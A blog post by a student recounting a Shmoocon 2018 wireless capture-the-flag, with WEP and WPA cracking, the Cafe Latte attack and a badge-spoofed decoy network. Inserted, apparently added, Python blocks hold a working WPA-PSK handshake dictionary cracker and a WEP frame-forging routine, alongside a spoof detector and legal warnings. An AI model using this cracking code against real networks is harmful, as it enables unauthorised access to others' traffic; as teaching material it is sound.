Wireless Hacking, a Beginners Experience at Shmoocon 2018

In the last few weeks, from January 19th to the 21st, I received the opportunity to be Shmoozed at Shmoocon (they let me in for free and gave me $200 cash at the door). The process began by filling out an application and getting a letter of recommendation from a professor. They do this as a way to get college students to attend, and it lets people who are willing to pay more for their own ticket cover a college kid's admission.

One of the most exciting parts of the weekend was the Wireless CTF in the Wireless Village. Shmoocon was the first time I had ever had exposure to wireless hacking at this level, since building a test network of your own is expensive (for a college student) and attacking other people's networks without permission is illegal. For context, wardriving/warwalking is the process of driving or walking around an area with a laptop or phone to collect packets from other people's Wi-Fi networks. Collecting and cracking traffic from networks you do not own is illegal without explicit permission from the network owner(s).

At first, I sought out advice from the organizers. They were very adamant about using an operating system called Pentoo Linux, which is built on Gentoo Linux. Linux is, for the most part, a free, open-source operating system developed by an open community. (macOS, for comparison, descends from the Unix/BSD family rather than from Linux, although the two share much of the same command-line tooling.) Part of the reason they were so adamant about Pentoo is that one of the organizers of the Wireless Village is a developer of the operating system itself. It ships with many tools preinstalled, as well as the driver software needed to work with the external wireless adapters that wireless hacking requires. For some reason, they did not like people using Kali Linux, which is traditionally the default operating system for security testing. I was able to do all of the work from a live USB drive.

Over the course of the next two days, I progressed through three of the challenges, attempted a fourth that I could not complete due to hardware limitations, and got tricked into completing a fake challenge (more on this later).

The first challenge was to open the PowerPoint and submit the given password to the submit server, just to confirm that it was working. Nothing special here, basically free points.

The second challenge involved cracking WEP, which stands for "Wired Equivalent Privacy." WEP is no longer considered secure: it encrypts each frame with RC4 using a per-frame key made from a 24-bit Initialization Vector (IV), sent in the clear, prepended to the static network key. With only about 16.7 million possible IVs, and many cards reusing or sequentially cycling them, the same RC4 keystream gets reused, and the way the IV feeds RC4 also leaks information about the key itself; aircrack-ng exploits this statistically once it has seen enough IVs. It took approximately 1 hour of collecting packets using airodump-ng, a packet capture tool similar to Wireshark that grabbed every data frame flying by in the area. After getting enough IVs, I was able to use aircrack-ng along with the supplied password list to get the password. This was all done with the network card on my laptop, with no external cards needed.

The third challenge was cracking WPA, which stands for Wi-Fi Protected Access. WPA is the more modern, more "secure" replacement for WEP (yes, there is WPA2, but that was not the point of this challenge). To crack WPA-PSK, I needed to capture the 4-way handshake, because the handshake is the only traffic that lets an offline guess at the passphrase be checked. To give a little context, I will defer to Wikipedia on this one:

The four-way handshake is designed so that the access point (or authenticator) and wireless client (or supplicant) can independently prove to each other that they know the PSK/PMK, without ever disclosing the key. Instead of disclosing the key, the access point (AP) and client encrypt messages to each other—that can only be decrypted by using the PMK that they already share—and if decryption of the messages was successful, this proves knowledge of the PMK. The four-way handshake is critical for protection of the PMK from malicious access points—for example, an attacker's SSID impersonating a real access point—so that the client never has to tell the access point its PMK.

The PMK is designed to last the entire session and should be exposed as little as possible; therefore, keys to encrypt the traffic need to be derived. A four-way handshake is used to establish another key called the Pairwise Transient Key (PTK). The PTK is generated by concatenating the following attributes: PMK, AP nonce (ANonce), STA nonce (SNonce), AP MAC address, and STA MAC address. The product is then put through a pseudo-random function. The handshake also yields the GTK (Group Temporal Key), used to decrypt multicast and broadcast traffic.

In the process of connecting to the network, an endpoint device (laptop/cellphone/Xbox/etc.) goes through this handshake so that the device and the access point each prove they hold the same key. Each handshake message carries a MIC computed with a key derived from the PMK, which is what makes the offline attack possible: an attacker who captured the handshake can derive the PMK from a candidate passphrase, derive the PTK from it, recompute the MIC and compare it with the captured one. Just by chance, I captured two of these handshakes, and again using aircrack-ng and the supplied word list I obtained the password successfully.
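To make the handshake-based dictionary attack concrete, here is an added Python example (my illustration, not code from the article, the CTF or aircrack-ng) that carries out the derivation the Wikipedia passage describes: PBKDF2 turns each candidate passphrase into a PMK, the 802.11i PRF-512 expands the PMK, both MAC addresses and both nonces into the PTK, and the first 16 bytes of the PTK (the KCK) are used to recompute the MIC on message 2 of the captured handshake; a match means the guess was the passphrase. The SSID, MAC addresses, nonces, word list and the EAPOL-Key frame are all constructed for the example, and build_message2 exists only to fabricate a frame to crack; in a real run that frame is pulled from the airodump-ng capture.

```python
import hashlib
import hmac

# Offset of the 16-byte Key MIC field inside an EAPOL-Key frame, counting from the
# start of the 4-byte EAPOL header: 1 descriptor + 2 key info + 2 key length
# + 8 replay counter + 32 nonce + 16 key IV + 8 RSC + 8 key ID = 77, plus 4.
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This is the slow step, repeated once per word in the list."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    The min/max ordering is why both MACs and both nonces must be read from the capture."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for counter in range(4):  # 4 x 20 bytes = 80, truncated to 64
        msg = b"Pairwise key expansion" + b"\x00" + data + bytes([counter])
        out += hmac.new(pmk, msg, hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol: bytes, key_version: int) -> bytes:
    """Key MIC over the whole EAPOL-Key frame with its MIC field zeroed.
    key_version 1 = WPA/TKIP (HMAC-MD5), 2 = WPA2/CCMP (HMAC-SHA1 truncated to 16 bytes)."""
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    digest = hashlib.md5 if key_version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:16]


def crack_psk(wordlist, ssid, ap_mac, sta_mac, anonce, snonce, eapol, key_version):
    """Offline dictionary attack: guess -> PMK -> PTK -> KCK (first 16 bytes of the PTK)
    -> recompute the MIC of the captured frame and compare with the captured MIC."""
    captured_mic = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for word in wordlist:
        pmk = pmk_from_passphrase(word, ssid)
        kck = derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol, key_version), captured_mic):
            return word
    return None


def build_message2(passphrase, ssid, ap_mac, sta_mac, anonce, snonce, key_version):
    """CONSTRUCTED message 2 of the 4-way handshake (supplicant -> AP), the frame that
    carries the SNonce and the first MIC. The layout follows the EAPOL-Key format, but
    every value is made up for this example; in practice the frame comes from a capture."""
    descriptor = b"\x02" if key_version == 2 else b"\xfe"   # RSN vs legacy WPA descriptor
    key_info = (0x0108 | key_version).to_bytes(2, "big")      # pairwise + MIC bit + version
    body = (descriptor + key_info + (16).to_bytes(2, "big") + (1).to_bytes(8, "big")
            + snonce + bytes(16) + bytes(8) + bytes(8) + bytes(16) + bytes(2))
    eapol = b"\x01\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v1, type 3 = Key
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, eapol, key_version)
    return eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + 16:]


if __name__ == "__main__":
    # Constructed "capture": SSID, MACs, nonces and the passphrase are all invented.
    ssid = "Network_10"
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    frame = build_message2("latte2018", ssid, ap_mac, sta_mac, anonce, snonce, 1)
    wordlist = ["password", "shmoocon", "latte2018", "wireless"]
    print(crack_psk(wordlist, ssid, ap_mac, sta_mac, anonce, snonce, frame, 1))
```

Two things worth noticing in the code: the 4096-iteration PBKDF2 is the whole cost of the attack, which is why a long passphrase that is not in any word list is the defence, and nothing about the handshake depends on the capture being complete beyond message 2 (ANonce from message 1, SNonce and MIC from message 2), which is why aircrack-ng can succeed on a partial handshake.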

The fourth challenge, which I attempted but could not complete due to a hardware limitation, was an attack called the Cafe Latte attack. The name does not come from de-authentication; it comes from the claim that an attacker can recover a client's WEP key in about the time it takes to finish a latte at a cafe, by targeting the client directly, even when the real access point is out of range. De-authentication is a separate technique from the same toolset: an attacker sends forged management frames that cause an already connected device (i.e., someone else's laptop or phone) to drop off the network and re-authenticate, which is also how a handshake gets captured on demand rather than by chance.

The Cafe Latte attack lets you obtain a WEP key from a client system. Briefly, this is done by capturing an ARP packet from the client, manipulating it, and sending it back to the client. The manipulation works without knowing the key because WEP's integrity check is a CRC-32, which is linear: flipping chosen bits of the encrypted frame and applying the matching correction to the encrypted checksum yields a different frame that still validates. The client, in turn, answers with a stream of packets, each under a fresh IV, which can be captured by airodump-ng. Subsequently, aircrack-ng can be used to determine the WEP key.
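As an added example that is not part of the original article, the following Python models the two WEP properties that both the WEP challenge and the Cafe Latte attack above rest on: a 24-bit IV that repeats (so two frames share an RC4 keystream and their ciphertexts XOR to the XOR of their plaintexts), and a CRC-32 integrity check that can be corrected after flipping bits in the ciphertext without knowing the key. The WEP key, IV and ARP-like payloads are constructed values; RC4 and the WEP framing are the real algorithms, reduced to the frame body (no 802.11 header and no key-index byte).

```python
import math
import struct
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (KSA + PRGA), the cipher WEP wraps around a per-frame key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(wep_key: bytes, iv: bytes, payload: bytes) -> bytes:
    """WEP frame body: 3-byte IV in the clear || RC4(IV || key) over payload || CRC-32 ICV."""
    assert len(iv) == 3
    icv = struct.pack("<I", zlib.crc32(payload))
    return iv + xor_bytes(payload + icv, rc4_keystream(iv + wep_key, len(payload) + 4))


def wep_decrypt(wep_key: bytes, frame: bytes):
    """Returns (payload, icv_ok). The ICV is the only integrity check a WEP receiver makes."""
    iv, body = frame[:3], frame[3:]
    plain = xor_bytes(body, rc4_keystream(iv + wep_key, len(body)))
    payload, icv = plain[:-4], struct.unpack("<I", plain[-4:])[0]
    return payload, icv == zlib.crc32(payload)


def iv_collision_probability(frames: int) -> float:
    """Birthday bound for random 24-bit IVs: chance that at least one IV has repeated.
    Cards that start at IV 0 on reset or count sequentially make reuse even more certain."""
    return 1.0 - math.exp(-frames * (frames - 1) / (2 * 2 ** 24))


def keystream_reuse_leak(frame_a: bytes, frame_b: bytes) -> bytes:
    """Two frames under the same IV share a keystream, so C1 xor C2 = P1 xor P2.
    No key is needed; only the overlapping payload prefix is recovered."""
    assert frame_a[:3] == frame_b[:3], "attack needs a repeated IV"
    n = min(len(frame_a), len(frame_b)) - 7   # drop the IV and the ICV
    return xor_bytes(frame_a[3:3 + n], frame_b[3:3 + n])


def flip_bits(frame: bytes, delta: bytes) -> bytes:
    """Rewrite an encrypted WEP frame without the key and keep its ICV valid.
    CRC-32 is affine: crc(P xor d) = crc(P) xor crc(d) xor crc(zeros of len(P)).
    XOR d into the ciphertext body and the matching correction into the encrypted ICV.
    This is the primitive behind turning a captured ARP into a new, valid ARP."""
    iv, body, enc_icv = frame[:3], frame[3:-4], frame[-4:]
    assert len(delta) == len(body)
    correction = zlib.crc32(delta) ^ zlib.crc32(bytes(len(body)))
    return iv + xor_bytes(body, delta) + xor_bytes(enc_icv, struct.pack("<I", correction))


if __name__ == "__main__":
    # Constructed values: a 40-bit WEP key, one IV, and two ARP-shaped payloads.
    key, iv = bytes.fromhex("0102030405"), b"\x00\x00\x07"
    p1 = b"who-has 192.168.1.1 tell 192.168.1.50"
    f1 = wep_encrypt(key, iv, p1)
    print("P(IV repeat) after 5000 frames: %.2f" % iv_collision_probability(5000))
    forged = flip_bits(f1, bytes(len(p1) - 2) + b"\x00\x05")   # '50' -> '55' in the sender
    print(wep_decrypt(key, forged))
```

The forged frame decrypts to a different sender address and still passes the ICV check, which is exactly the property a client relies on when it answers a replayed, modified ARP; every answer arrives under a new IV, so the attacker collects IVs without ever touching the real access point.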

The hardware limitation I had at the time was that I did not have an external network card. As such, I could not send de-authentication packets while simultaneously sniffing the network. Generally, in wireless hacking, people use several cards: one network card for sniffing packets (just grabbing them out of the air as they fly by), a second for packet injection/attacks, another card if they are sniffing/working on a 5 GHz network (most of the wireless network attack challenges ran on the 2.4 GHz band), and lastly, if they are going for the radio challenges, an RTL-SDR or HackRF.

These last two devices are software-defined radios: USB devices that can listen across a wide range of the radio frequency spectrum and hand the raw signal to software for decoding. With one of these you can listen on many different frequencies, such as AM radio, FM radio, security systems, pagers, cell phones, Bluetooth, Z-Wave (a home Internet of Things protocol), ZigBee (another home IoT protocol) and, with a radio that tunes high enough, Wi-Fi. Again, there is a hardware limitation: you need one of these devices to participate in those challenges at all. The RTL-SDR is the cheap $20 one that can be bought on Amazon; it tunes roughly 24 MHz to 1.7 GHz, so it cannot reach the 2.4 GHz Wi-Fi band, and it can only receive, not transmit. The HackRF One is a lot more expensive, at around $300 or more; it covers about 1 MHz to 6 GHz, can transmit as well as receive, and so can do a bit more fun stuff.

The last challenge that I attempted turned out not to be a challenge at all, or at least it did not get me any points. At the very beginning of the Wireless CTF, they do a baseline, so to speak, where all participants survey the networks in range. When baselining, a person wants to know, from a given spot, each network's SSID (the human-readable network name) and its BSSID, which is the MAC address of the access point. A MAC address is an identifier, also sometimes called a physical address, that looks something like 01-23-45-67-89-ab. It is not the same as an IP address: IP addresses are dynamically allocated within a traditional network, whereas a MAC address is assigned to the network interface by its manufacturer. A card's driver can be told to use any value, though, so a MAC address is not proof of identity. Another thing to benchmark is the signal strength, as it should not fluctuate beyond a certain point so long as neither device moves, i.e., you sit in the same chair for each day of the challenge.

During the last day of the challenge, there were two wireless networks with the same SSID, something along the lines of "Network_10", and both happened to have the same BSSID (MAC address). They had varying signal strengths. One was using WEP encryption, and the other was using WPA encryption. Being naive and never having done this before, part of me thought that this was some part of the challenge. As it turns out, it was not a challenge, at least for me. I started with the WEP one and hammered away at it. I finally got the password as the string "Incorrect." I thought maybe this was a little weird, but whatever, I followed the same process as in the similar challenge before. When I submitted the password to the submit server, it came back that the solution was incorrect, and I received no points.
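Here is an added Python example (mine, not from the article) of the baseline check described above, generalised slightly: it takes a survey of beacons (BSSID, ESSID, privacy, channel, power) from day one and a later survey from the same seat, and flags the signs of a spoofed network: one BSSID advertising two different ESSID/privacy combinations, an ESSID that has gained an encryption type it did not have at baseline, and a BSSID whose signal strength jumped although nobody moved. The CSV rows are constructed for the example, in a simplified layout rather than airodump-ng's own CSV format; the detection logic is the point.

```python
import csv
import io
from collections import defaultdict

# Constructed beacon survey rows for this example (not a real capture). Each row is one
# observed beacon. A real survey would come from airodump-ng or from parsing beacon
# frames out of a pcap; the column layout here is simplified and not airodump-ng's.
BASELINE = """\
bssid,essid,privacy,channel,power
00:11:22:33:44:01,Network_10,WEP,6,-48
00:11:22:33:44:02,Network_11,WPA,11,-55
00:11:22:33:44:03,Network_12,WPA2,1,-60
"""

LATER = """\
bssid,essid,privacy,channel,power
00:11:22:33:44:01,Network_10,WEP,6,-47
00:11:22:33:44:01,Network_10,WPA,6,-31
00:11:22:33:44:02,Network_11,WPA,11,-56
00:11:22:33:44:03,Network_12,WPA2,1,-62
"""


def parse_survey(text: str):
    """Parse CSV survey rows into dicts, with power as an int (dBm)."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        row = {k.strip(): v.strip() for k, v in row.items()}
        row["power"] = int(row["power"])
        rows.append(row)
    return rows


def find_anomalies(baseline_rows, later_rows, power_delta=15):
    """Compare a later survey against the baseline taken from the same seat.

    Returns (kind, bssid, detail) tuples for:
      * bssid_conflict: one BSSID advertising more than one (essid, privacy) pair at
        once, which a single real radio does not do;
      * privacy_changed: an ESSID seen with a privacy type it did not have at baseline
        (e.g. a WEP twin of a WPA network), the lure in a fake-AP setup;
      * power_jump: a BSSID whose power moved by more than power_delta dBm."""
    findings = []
    base_by_bssid = {r["bssid"]: r for r in baseline_rows}
    base_privacy = defaultdict(set)
    for r in baseline_rows:
        base_privacy[r["essid"]].add(r["privacy"])

    seen_by_bssid = defaultdict(set)
    for r in later_rows:
        seen_by_bssid[r["bssid"]].add((r["essid"], r["privacy"]))
    for bssid, combos in seen_by_bssid.items():
        if len(combos) > 1:
            findings.append(("bssid_conflict", bssid, sorted(combos)))

    for r in later_rows:
        known = base_privacy.get(r["essid"])
        if known and r["privacy"] not in known:
            findings.append(("privacy_changed", r["bssid"], (r["essid"], r["privacy"])))
        base = base_by_bssid.get(r["bssid"])
        if base and abs(r["power"] - base["power"]) > power_delta:
            findings.append(("power_jump", r["bssid"], (base["power"], r["power"])))
    return findings


if __name__ == "__main__":
    for finding in find_anomalies(parse_survey(BASELINE), parse_survey(LATER)):
        print(finding)
```

On the constructed data, every finding points at the same BSSID: it is advertising both a WEP and a WPA "Network_10", the WEP variant is new since baseline, and the stronger of the two is much closer than the real access point was on day one. Any one of those alone is worth a second look before spending an hour cracking the network; all three together is the spoof described above.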

At the end of the Wireless CTF, it was revealed that one person was spoofing that network. It was a rather clever trick. To backpedal a little bit: at Shmoocon, we were each given a rocket-shaped circuit board on a lanyard as a badge. When I took the plastic casing off, I discovered three things: a micro USB port, a USB serial module and, lastly, a wireless network module. As it turns out, all of the boards were built around an Arduino-style microcontroller. Arduino boards are small, single-purpose microcontroller boards used for developing little hardware circuits. I had some small experience with these when I developed a 'truly' random number generator that reads the decay of uranium ore that I bought off Amazon. This came from a joke of an early teacher, shout out to Evan Golub, who never expected his students to take his jokes about putting uranium in a computer seriously. Anyway, the Computer Science department does not offer courses using Arduino devices. That project will be explained in a forthcoming article.

The other participant had reverse engineered their Shmoocon badge to spoof an easily crackable WEP "secured" network that I unknowingly cracked correctly, but did not earn myself any points for. The Wireless Village liked his trick, and so he received points any time someone submitted his flag. Thinking that I had misspelled "Incorrect", I submitted it twice and got him double points.

Overall, it was a great experience to play in the Wireless CTF. I have since spent more time learning Wi-Fi cracking using the packet capture files (PCAP files) I collected, with their permission, at the conference.

Just a reminder, as always: this article is for educational purposes only. Don't break the law. I am not responsible for anyone who goes to jail because of this. I am still in college and will not post your bail. Hacking laws in the US are very ill-defined or very well-defined, depending on the way you look at them. Even connecting to an open network that you were not authorized to use can be prosecuted as a computer crime under federal and state law, with penalties that can run to years in prison.

No solutions to the real challenges were posted in this article because the wireless CTF is going to be rerun at BSidesCharm this April.

Addendum:

After participating in the Wireless CTF, there are some simple things we can do to protect ourselves. Whether on public Wi-Fi or our own network, using a VPN is highly recommended, as it adds a layer of encryption over your traffic and so limits what an eavesdropper on the wireless link can see. WPA2 is still the standard to use as of this writing; the KRACK key-reinstallation attacks published in late 2017 showed that its 4-way handshake could be manipulated into reusing keys, but that is a protocol bug fixed by patching clients and access points, not a shortcut for cracking the passphrase. So on your own home Wi-Fi, use WPA2 (WPA3 when it arrives), keep your devices patched, and use a long, unguessable passphrase, since the handshake attack above only works when the passphrase is in the attacker's word list.

More articles by Richard M. Vook

  • Book Holders Website Vulnerability
    Like many college students, after spending hundreds of dollars on textbooks that I don't even need for a course because…

  • The Modern Molotov
    Molotov or Molotov cocktail is defined as a crude incendiary device typically consisting of a bottle filled with…

  • Domino's Pizza vulnerability
    Quick read on a vulnerability in the payment system that allowed users to get free pizza.

  • Facebook vulnerability
    Quick read on a vulnerability where one could brute force the password reset code on beta.facebook.

  • DROWN Attack
    Interesting read on an HTTPS vulnerability.

  • Nissan Leaf vulnerability?
    Interesting read on using VINs to gain access to Nissan Leafs.

  • Encrypted Facebook chat?
    Hmm..

  • TGI Fridays exploitation
    I was reading through some articles and found this one interesting. Simple example of how systems are vulnerable and…